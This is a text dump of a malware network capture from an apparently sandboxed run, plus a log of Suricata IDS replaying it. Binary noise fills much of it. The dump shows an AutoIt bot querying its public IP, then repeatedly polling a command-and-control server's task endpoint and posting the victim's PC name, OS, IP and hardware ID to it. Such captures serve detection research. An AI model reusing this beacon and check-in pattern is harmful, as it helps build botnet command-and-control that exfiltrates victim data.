
5,ˬÖcheckipdyndnsorg4
̸¥!
¢XdÈP’

̸vEh§a
¢XdÈPP+NGET / HTTP/1.1
User-Agent: AutoIt
Host: checkip.dyndns.org

4
̸Ø!
¢XdÈP’

̸vEh§a
¢XdÈPP+NGET / HTTP/1.1
User-Agent: AutoIt
Host: checkip.dyndns.org

4
Í|¾Ô¢XdÈ
PS

Í|7E)¦ ¢XdÈ
PPÿuHTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 102

<html><head><title>Current IP Check</title></head><body>Current IP Address: 37.59.25.8</body></html>
4
K¶¥!
MÞ(OPº

K¶žE8-
MÞ(OPP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4	xb¥!
MÞ(OPº	xbžE8-
MÞ(OPP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4	ß‹ã
MÞ(OP	߁Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4Àó¥!
MÞ(OPºÀóžE8-
MÞ(OPP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4	õs‹ã
MÞ(OP	õsEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4
ʥ!
MÞ(OPº
ÊžE8-
MÞ(OPP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4€š‹ã
MÞ(OP€šEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4¸¥!
MÞ(OPº¸žE8-
MÞ(OPP¥
GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4
Ró‹ã
MÞ(OP
RóEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4B¥!
MÞ(O PºBžE8-
MÞ(O PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4ß_‹ã
MÞ(OPß_Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4š¥!
MÞ(O!PºšžE8-
MÞ(O!PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4õ;‹ã
MÞ(OPõ;Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4ã¥!
MÞ(O"PºãžE8-
MÞ(O"PP¥
GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4¡‹ã
MÞ(OP¡Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4
¥!
MÞ(O#Pº
žE8-
MÞ(O#PP¥	GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4•¬‹ã
MÞ(OP•¬Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4eJ¥!
MÞ(O$PºeJžE8-
MÞ(O$PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4
"ë‹ã
MÞ(OP
"ëEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4«T¥!
MÞ(O%Pº«TžE8-
MÞ(O%PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4òå‹ã
MÞ(OPòåEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4™©¥!
MÞ(O&Pº™©žE8-
MÞ(O&PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4~É‹ã
MÞ(OP~ɁEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4뀥!
MÞ(O'Pºë€žE8-
MÞ(O'PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4…‹ã
MÞ(OP…Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
47@¥!
MÞ(O(Pº7@žE8-
MÞ(O(PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4!¬‹ã
MÞ(OP!¬Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4 Šr¥!
MÞ(O)Pº ŠržE8-
MÞ(O)PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4!®h‹ã
MÞ(OP!®hEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4"
Øí¥!
MÞ(O*Pº"
ØížE8-
MÞ(O*PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4#Á÷‹ã
MÞ(OP#Á÷Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4$
0c¥!
MÞ(O+Pº$
0cžE8-
MÞ(O+PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4%
O'‹ã
MÞ(OP%
O'Es7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4&!=Ö¥!
MÞ(O,Pº&!!=ÖžE8-
MÞ(O,PP¥GET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4'!Ú‹ã
MÞ(OP'!!ځEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4("‚ú¥!
MÞ(O-Pº(""‚úžE8-
MÞ(O-PP¤ÿGET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4)"µ܋
MÞ(OP)""¬µEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4*#²:¥!
MÞ(O.Pº*##²:žE8-
MÞ(O.PP¤þGET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4+#Áã‹ã
MÞ(OP+##ÁãEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4,$!¥!
MÞ(O/Pº,$$!žE8-
MÞ(O/PP¤ýGET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4-$LÁ‹ã
MÞ(OP-$$LÁEs7J
MÞ(OPPlPOST /newBot.php HTTP/1.1
User-Agent: agent
Referrer: http://www.yahoo.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
Accept: */*
Host: rektware19.temp.swtest.ru
Connection: Keep-Alive

pcname=TEQUILABOOMBOOM
&os=C:\WIN_XP
&bit=X86
&ip=37.59.25.8
&hwid={1BD10650-6D3F-5BC2-FBBC-1C8D9A8D2C45}
4.%	Y—¥!
MÞ(O0Pº.%%	Y—žE8-
MÞ(O0PP¤üGET /task.php HTTP/1.1
User-Agent: AutoIt
Host: rektware19.temp.swtest.ru
Cache-Control: no-cache

4/%
aù‹ã
MÞ(OP/%%
aùEs7J
MÞ(OPPlPOST /newBot.php 

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1203 bytes) - download
1
2
3
4
5
6
7
8
2019-07-25 05:57:13,884 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-07-25 05:57:14,611 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-07-25 05:57:14,611 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-07-25 05:57:14,612 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-07-25 05:57:14,612 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-07-25 05:57:14,612 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/04c847a258b82858fa76434ef923317756b33745cb75ec8c950e11a498e082d2 -r /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap -vvv -k none
2019-07-25 05:57:36,738 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-07-25 05:57:36,738 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 22.863437891